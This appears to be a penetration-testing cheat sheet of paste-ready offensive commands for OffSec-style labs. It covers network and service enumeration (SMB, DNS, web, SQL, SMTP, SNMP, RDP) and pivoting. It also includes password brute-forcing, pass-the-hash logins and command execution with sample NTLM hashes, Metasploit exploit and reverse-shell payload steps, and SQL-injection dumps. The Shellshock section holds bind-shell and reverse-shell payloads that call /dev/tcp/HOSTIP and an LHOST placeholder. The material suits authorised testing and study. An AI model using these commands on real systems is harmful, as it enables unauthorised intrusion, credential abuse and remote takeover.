Network

Scan for hosts

nmap -sn $iprange -oG - | grep Up | cut -d' ' -f2 > network.txt

Port scanning

TCP Top 1000:

nmap -Pn -sC -sV -oA tcp -vv $ip

All TCP Ports:

nmap -Pn -sC -sV -oA all -vv -p- $ip

When you're getting no where with the TCP ports - try UDP ports. Easily forgotten about!

UDP Top 100:

nmap -Pn -sU --top-ports 100 -oA udp -vv $ip

Utilize nmap's scripts

locate .nse | grep ftp

What does a script do?

nmap --script-help ftp-anon

Uniscan

uniscan -u $ip -qweds

Good nmap command

nmap -T4 -n -sC -sV -p- -oN nmap-versions --script='*vuln*' [ip]

unicornscan + nmap = onetwopunch

Unicornscan supports asynchronous scans, speeding port scans on all 65535 ports. Nmap has powerful features that unicornscan does not have. With onetwopunch, unicornscan is used first to identify open ports, and then those ports are passed to nmap to perform further enumeration.

./onetwopunch.sh -t targets.txt -i tun0 -n '-T4 -n -sC -sV -oN nmap-versions --script=*vuln*'

Vulnerability scanning

NSE scripts that scans for vulnerabilities are at ls -l /usr/share/nmap/scripts/*vuln*.

nmap -p 80 --script=all $ip - Scan a target using all NSE scripts. May take an hour to complete.
nmap -p 80 --script=*vuln* $ip - Scan a target using all NSE vuln scripts.
nmap -p 80 --script=http*vuln* $ip - Scan a target using all HTTP vulns NSE scripts.
nmap -p 21 --script=ftp-anon $ip/24 - Scan entire network for FTP servers that allow anonymous access.
nmap -p 80 --script=http-vuln-cve2010-2861 $ip/24 - Scan entire network for a directory traversal vulnerability. It can even retrieve admin's password hash.

Search services vulnerabilities

searchsploit --exclude=dos -t apache 2.2.3
msfconsole; > search apache 2.2.3

DNS

Find name servers

host -t ns $ip

fierce

fierce -dns $domain

Find email servers

host -t mx $ip

Subdomain bruteforcing

for ip in $(cat list.txt); do host $ip.$website; done

Reverse dns lookup bruteforcing

for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Zone transfer request

host -l $ip ns1.$ip
dnsrecon -d $ip -t axfr

Finds nameservers for a given domain

host -t ns $ip| cut -d " " -f 4 #
dnsenum $ip

Nmap zone transfer scan

nmap $ip --script=dns-zone-transfer -p 53

Finds the domain names for a host.

whois $ip

Find the IP and authoritative servers.

nslookup $ip

Finds miss configure DNS entries.

host -t ns $ip

TheHarvester finds subdomains in google, bing, etc

python theHarvester.py -l 500 -b all -d $ip

SMB and SAMBA

Server Message Block (SMB) Protocol is a network file sharing protocol, and as implemented in Microsoft Windows

Samba has provided secure, stable and fast file and print services for all clients using the SMB/CIFS protocol, such as all versions of DOS and Windows, OS/2, Linux and many others

SMB Version

Windows version

CIFS

Microsoft Windows NT 4.0

SMB 1.0

Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2

SMB 2.0

Windows Vista & Windows Server 2008

SMB 2.1

Windows 7 and Windows Server 2008 R2

SMB 3.0

Windows 8 and Windows Server 2012

SMB 3.0.2

Windows 8.1 and Windows Server 2012 R2

SMB 3.1.1

Windows 10 and Windows Server 2016

SMB uses the following TCP and UDP ports:

netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp
netbios-dgm 138/tcp # NETBIOS Datagram Service
netbios-dgm 138/udp
netbios-ssn 139/tcp # NETBIOS session service
netbios-ssn 139/udp
microsoft-ds 445/tcp # if you are using Active Directory

Checklist

  • Enumerate Hostname - nmblookup -A $ip

  • List Shares

    • smbmap -H $ip

    • echo exit | smbclient -L \\\\$ip

    • nmap --script smb-enum-shares -p 139,445 $ip

  • Check Null Sessions

    • smbmap -H $ip

    • rpcclient -U "" -N $ip

    • smbclient \\\\$ip\\[share name]

  • Check for Vulnerabilities - nmap --script smb-vuln* -p 139,445 $ip

  • Overall Scan - enum4linux -a $ip

  • Manual Inspection

    • smbver.sh $ip (port)

mblookup — NetBIOS over TCP/IP client used to lookup NetBIOS names

Scanning for the NetBIOS Service

SMB NetBIOS service listens on TCP ports 139 and 445, as well as several UDP ports.

nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24

nbtscan -r 192.168.1.0/24

Null Session Enumeration

Vulnerable SMB Versions

Vulnerable versions:

Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
Most Samba (Unix) servers

List of SMB versions and corresponding Windows versions:

SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

Empty LM and NTLM hashes:

Empty LM Hash: aad3b435b51404eeaad3b435b51404ee
Empty NT Hash: 31d6cfe0d16ae931b73c59d7e0c089c0

rpcclient

Manually probe a SMB server

rpcclient -U '' $ip
Password:
rpcclient $> srvinfo # operating system version
rpcclient $> netshareenumall # enumerate all shares and its paths
rpcclient $> enumdomusers # enumerate usernames defined on the server
rpcclient $> getdompwinfo # smb password policy configured on the server

Apparently the rpcclient version in OffSec VM does not work well with creating null sessions. A downgrade to samba-4.5.15 is required: https://forums.offensive-security.com/showthread.php?12943-Found-solution-to-enum4linux-rpcclient-problem-NT_STATUS_INVALID_PARAMETER&highlight=NT_STATUS_INVALID_PARAMETER Place the export commands into a script and source it before using rpcclient to use the downgraded version, or place it in bashrc. NOTE, once downgraded, pth-winexe doesn't seem to work.

enum4linux

Wrapper around smb programs like rpcclient to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using.

enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ip

CrackMapExec

Works perfectly, list shares and permissions, enum users, disks, code execute and run modules like mimikatz. Hashes work. Also will tell you exact version of Windows

crackmapexec -u 'guest' -p '' --shares $ip
crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
crackmapexec -u 'guest' -p '' --users $ip
crackmapexec smb 192.168.1.0/24 -u Administrator -p P@ssw0rd
crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz 192.168.1.0/24
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution

Also will tell you exact version of windows:

smbmap

Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution don't work.

smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
smbmap -u guest -p '' -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work

generally works a bit better than enum4linux as it enum4linux tends to error out a bit

downloads to the /usr/share/smbmap directory

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Download all

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q #downloads a file in quiet mode
smbmap -R $sharename -H $ip #Recursively list dirs, and files
smbmap -H $ip

default port it checks is 445, use -P 139 to point it at that port if 445 fails

smbclient

Access SMB shares interactively, seems to work with anonymous access. Hashes don't work.

smbclient //$ip/wwwroot
smbclient //$ip/C$ WIN20082017 -U Administrator
smbclient //$ip/C$ A433F6C2B0D8BB92D7288ECFFACFC7CD -U Administrator --pw-nt-hash # make sure to only use the NT portion of the hash

WARNING, be careful when using the get command to download absolute path files from the remote system. Eg. get /etc/passwd will download the passwd file and overwrite YOUR /etc/passwd. Use get /etc/passwd /tmp/passwd instead.

To download recursively:

# Within smbclient, download everything recursively:
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir'
lcd '~/path/to/download/to/'
mget *

pth-winexe

Works great sometimes. Can open a windows cmd shell.

pth-winexe -U administrator%WIN20082017 //$ipcmd # using a plaintext password
pth-winexe -U Administrator%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # ntlm hash encrypted with https://www.browserling.com/tools/ntlm-hash
pth-winexe -U domain/user%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # domain user
pth-winexe -U Administrator%8F49412C8D29DF02FB62879E33FBB745:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # lm+ntlm hash encrypted with https://asecuritysite.com/encryption/lmhash
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # ntlm hash + empty lm hash
# or
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U Administrator% //$ip cmd

smbenum.sh

#!/bin/bash
#SMB Enumeration using nmap
#(c) Mike Digital Offensive
if [ -z "$1" ]
then
echo "Error please provide host to enumerate"
exit
else
nmap -script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $1
fi

Samba version checker

smbver.sh

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
nmblookup -A $ip
enum4linux -a $ip

Used to enumerate data from Windows and Samba hosts and is a wrapper for smbclient, rpcclient, net and nmblookup

Look for users, groups, shares, workgroup/domains and password policies

list smb nmap scripts

locate .nse | grep smb

find SAMBA version number using the SMB OS discovery script:

nmap -A $ip -p139

then google to see if version is vulnerable

SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename

Use the GUI to browse and download ^ example above

Brute force login

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv

RID

Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum. If you specify a password file, it will automatically attempt to brute force the user accounts when its finished enumerating.

https://tools.kali.org/maintaining-access/ridenum

Null Session

A null SMB session can be used to gather passwords and useful information from SMB 1 by looking in shares that are not password protected for interesting files. Windows NT/2000 XP default settings allow this. Windows 2003/XP SP2 SMB this behaviour is disabled.

Null session and extract information.

nbtscan -r $ip

Version

msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run

MultiExploit

msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run

Show all nmap SMB scripts

ls -ls /usr/share/nmap/scripts/smb*

Quick enum:

nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip

Quick vuln scan:

nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip

Full enum and vuln scanning:

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip

Full enum & vuln scan:

nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

Mount:

smbclient //$ip/share -U username
smblclient -N -L \\$ip

Anonymous mount:

smbclient //$ip/share # hit enter with blank password

Eternal Blue

Exploits a critical vulnerability in the SMBv1 protocol

Worth testing Eternal blue - you might get lucky although (the system should be patched to fix this)

Vulnerable versions

Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016

nmap -p 445 $ip --script=smb-vuln-ms17-010

Bruteforce

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb

Any metasploit exploit through Netbios over TCP in 139, you need to set:

set SMBDirect false

NFS

Show all mounts

showmount -e $ip

Mount a NFS share

mount $ip:/vol/share /mnt/nfs

Use nfspy to mount a share. Will get around permission errors

nfspysh -o server=$ip:/home/vulnix/

Web

If you get a certificate redirecting you to 443/https check for alt names

add these to /etc/hosts file
nikto -h $ip
nikto -h $ip -p 80,8080,1234 #test different ports with one scan
-Tuning Options
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt

Directory Discovery

use a few different files, check seclists for web discovery

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://$ip/FUZZ

It is worth scanning using a good number of word lists as well as scanning the directories recursively - which takes time. Its good to refer back to your findings when you're stuck. It may help you find where shells have been uploaded to.

https://github.com/PinkP4nther
#follow guide, might have to run these commands if guide doesnt work then re run guideapt install cargo, apt install pkg-config
./erodir -u http:/$ip -e /usr/share/wordlists/dirb/common.txt -t 20
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50

works recursively

cd /root/dirsearch; python3 dirsearch.py -u http://$ip/ -e .php

If really stuck run this

for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "200,204,301,302,307" -t 20 ; done
./whatweb $ip # identifies all known services

Methods testing

nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Brute Forcing authentication

hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin

Vulnerability scanning:

nikto -host http://$ip
nmap --script=http-vuln* $ip

Test against SQLI

sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql

Coldfusion vulnerability scanning

nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip

Brute force basic auth

hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path

If you can register yourself on the site like a normal users - do this. There maybe an upload feature of the site which you can take advantage of.

./bfac --url http://$ip/ --level 4

WebDav

Test for it

davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/

Mysql

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306

Nmap scan

nmap -sV -Pn -vv -script=mysql* $ip -p 3306

Vuln scanning:

sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all

If Mysql is running as root and you have access, you can run commands:

mysql> select do_system('id');
mysql> \! sh

Enumerate MSSQL Servers on the network

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info $ip

Bruteforce MsSql

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Log in to a MsSql server:

# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME

SMTP

Always do users enumeration

for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip
use auxiliary/scanner/smtp/smtp_enum

Command to check if a user exists

VRFY root

Command to ask the server if a user belongs to a mailing list

EXPN root

Enumeration and vuln scanning:

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

Bruteforce

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Metasploit user enumeration

use auxiliary/scanner/smtp/smtp_enum

Testing for open relay

telnet $ip 25
EHLO root
MAIL FROM:root@target.com
RCPT TO:example@gmail.com
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT

RPC (135)

Enumerate, shows if any NFS mount exposed:

rpcinfo -p $ip
nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom

FTP enumeration

Enumerate:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Bruteforce

hydra -l user -P /usr/share/john/password.lst ftp://$ip:21

Bruteforce with metasploit

msfconsole -q msf> search type:auxiliary login: msf> use auxiliary/scanner/ftp/ftp_login

Vuln scan

nmap --script=ftp-* -p 21 $ip

TFTP

If unauthenticated access is allowed with write permissions you can upload a shell:

tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
nmap -sU -p 69 --script tftp-enum.nse $ip

or

use auxiliary/scanner/tftp/tftpbrute

connecting/interacting: tftp $ip tftp> put payload.exe tftp> get file.txt

SSH

User enumeration

use auxiliary/scanner/ssh/ssh_enumusers
set user_file /usr/share/wordlists/metasploit/unix_users.txt
or
set user_file /usr/share/seclists/Usernames/Names/names.txt
run
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip

Bruteforce

hydra -v -V -l root -P password-file.txt $ip ssh

With list of users:

hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
  • You can use -w to slow down

SSL

Open a connection

openssl s_client -connect $ip:443

Basic SSL ciphers check

nmap --script ssl-enum-ciphers -p 443 $ip
  • Look for unsafe ciphers such as Triple-DES and Blowfish

  • Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...

SNMP

Enumeration

enumerate Community strings

./onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.11.1.73

Community string too long If you see this download onesixtyone from Github and run it there

v1

snmp-check -t $ip -c public

use nmap to enumerate info

nmap -sU -p161 --script "snmp-*" $ip

snmpwalk

apt install snmp-mibs-downloader #translates MIBs into readable format
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
snmpwalk -c public -v1 $ip
snmpenum $ip public windows.txt

Less noisy:

snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25

Based on UDP, stateless and susceptible to UDP spoofing

nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip

POP3

Test authentication:

telnet $ip 110
USER uer@$ip
PASS admin
list
retr 1

Finger

port 79

https://touhidshaikh.com/blog/?p=914

Find Logged in users on target.

finger @$ip
if there is no user logged in this will show no username

Check User is existed or not.

finger $username@$ip

The finger command is very useful for checking users on target but it’s painful if brute-forced for a username.

Using Metasploit fo Brute-force target

use auxiliary/scanner/finger/finger_users
set rhosts $ip
set users_file
run
cd /tmp/
wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
tar -xvf finger-user-enum-1.0.tar.gz
cd finger-user-enum-1.0
perl finger-user-enum.pl -t 10.22.1.11 -U /tmp/rockyou-top1000.txt

RDP

Install RDP nmap scripts

https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/amp/
nmap -p 3389 --script rdp-ntlm-info $ip

Bruteforce

ncrack -vv --user administrator -P password-file.txt rdp://$ip
hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

Kerberos

Test MS14-068

LDAP

Enumeration:

ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"

Email addresses enumeration

Find emails in google, bing, pgp etc

theharvester -d $ip -b google

Contact information for the domains they host

whois $ip

Find emails and employee name with Recon-ng:

recon-ng; use module; set DOMAIN $ip; run;
recon/contacts/gather/http/api/whois_pocs

Find xss published ad xssed.co

recon/hosts/enum/http/web/xssed

Find subdomain

recon/hosts/gather/http/web/google_site

Finds IPs close to the domain and possible new domains

recon/hosts/gather/http/web/ip_neighbor

Google search

  • site:xxx -site:www.xxx

  • filetype: look for specific documents, pdf, docx, etc..

  • inurl

  • intitle

  • Others https://www.exploit-db.com/google-hacking-database/

nmap has many vulnerability scanning NSE scripts in /usr/share/nmap/scripts/

OpenVAS

  • Powerful vulnerability scanner with thousands of scan checks. Setup:

openvas-setup; openvas-adduser; gsd

Well known exploits

Shellshock

The following tool will test it.

git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose

You can also:

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status

Shellshock over SSH:

ssh username@$ip '() { :;}; /bin/bash'

Exploit shellshock via curl, use -k switch to force curl to bypass any SSL warnings. Replace the bash command with anything.

curl http://192.168.123.123/path/to/cgi- bin/name_of_vuln_cgi -H "custom:() { ignored; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1 "

HeartBleed

Test web server

sslscan $ip:443

Internet explorer 6

Vulnerable to msf exploit(ms10_002_aurora)

Tunneling your traffic through another host

  • sshuttle -r root@$ip 10.10.10.0/24

Port forwarding

Simplest type of traffic redirection, consists on accepting traffic from one address and port port and redirecting it to another address and port.

It can be useful to bypass address and port based filters. Rinetd is a linux tool to do it.

Local port forwarding

Creates an encrypted tunnel through two machines and have traffic redirected to a final host and port, similar to port forwarding This is useful when you are trying to connect from your machine to a destination using a gateway. The syntax is:

ssh gateway_host -L local_port:remote_host:remote_port

You can later create a SSH session to the local port and have and SSH tunneled to destination:

ssh hop_machine -L 31337:banned_machine:22
ssh -p 31337 localhost

Remote port forwarding

It creates a tunnel from the target machine to your local machine, which allows connecting to an arbitrary port on the target. Useful if the target is in a non-routable network from your local machine. This is useful when you are trying to connect to a host, behind a firewall that blocks incoming connections. This technique works as the previous one, but the connection is started from the gateway. The syntax is:

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic Port Forwarding

Allows to create a tunnel from the target to your machine, and have the traffic routed to any host through target. You can configure a local port to forward traffic to multiple destinations passing through a single host. It is similar to local port forwarding but allows multiple destinations. It uses the SOCKS protocol. The syntax is:

ssh -D local_port remote_add

The connection of the previous command is established at port 22 of remote addr.

Pivoting

1. drop 3proxy.exe

2. Set up a config file:

allow *_
internal IP_SAME_NETWORK
external IP_OTHER_NETWORK
socks -p1081

3. Add to /etc/proxychains.conf:

socks4 IP_SAME_NETWORK 1081

4. Scan:

proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5

Double-pivoting

Pivoting through two different networks:

First, create a dynamic port forwarding through the first network:

ssh -f -N -D 9050 root@10.1.2.1

Edit /etc/proxychains.conf and add as default gateway:

socks4 127.0.0.1 9050

Use the proxy to create a second dynamic port forward to the second network:

proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22

Edit again /etc/proxychains.conf and add as default gateway:

socks4 127.0.0.1 10050
  • You can now use proxychains to pivot to the target network:

    proxychains nmap -sTV -n -PN 10.1.2.1 -254

CVEs

  • http://www.cvedetails.com/
    https://www.exploit-db.com/

Word Lists

  • /usr/share/seclists/
    /usr/share/wordlist/
    /usr/share/metasploit-framework/data/wordlists/

Minimal web server

  • for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done

Proxy

Protocols

http://
http://
connect://
sock4://
sock5://